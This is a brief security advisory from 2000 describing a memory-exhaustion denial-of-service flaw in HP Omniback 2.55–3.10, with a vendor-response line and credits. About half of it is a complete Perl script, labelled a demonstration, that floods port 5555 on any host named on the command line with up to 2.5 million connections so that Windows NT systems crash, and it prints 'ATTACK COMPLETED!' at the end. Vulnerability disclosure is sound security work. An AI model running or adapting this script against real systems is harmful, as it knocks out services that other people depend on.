HP Omniback Denial of Service Reported March 3, 2000 by John Hittner
VERSIONS AFFECTED
HP Omniback 2.55, 3.0, 3.10
DESCRIPTION
When a number of connections are made on port
5555 of an Omniback-enabled system, the Omnilnet process consumes memory until the system
crashes. If the connections are closed Omniback does not free up the memory.
DEMONSTRATION
#!/usr/bin/perl
#
# Jon Hittner
# Raise the memory size for omnilnet until Windows NT crashes
# Test against NT4.0 SP5 , NT3.51 , Winframe 1.7 SP5b , Winframe 1.8
# Probably needs to be run several times to crash the system depending
# on the amount of memory in the system.
# This code was written to demo a problem, and I take no respoablity on how
# it"s used
use strict; use Socket;
my($y,$h,$p,$in_addr,$proto,$addr);
$h = "$ARGV\[0\]"; $p = 5555 if (!$ARGV\[1\]);
if (!$h) \{ print "A hostname must be provided. Ex: www.domain.com\n"; \}
$in_addr = (gethostbyname($h))\[4\]; $addr = sockaddr_in($p,$in_addr);
$proto = getprotobyname("tcp");
print "TESTING: $h:$p\n";
for ($y=1 ; $y<2500000 ; $y++) \{
socket(S, AF_INET, SOCK_STREAM, $proto);
connect(S,$addr) or next;
select S;
$| = 1;
select STDOUT;
send S,"OMNIBACK HAS SOME BIG ISSUES",0;
\}
print "ATTACK COMPLETED!\n";
VENDOR RESPONSE HP is aware of this issue,
however no response was known at the time of this writing.
CREDITS Discovered by John Hittner
|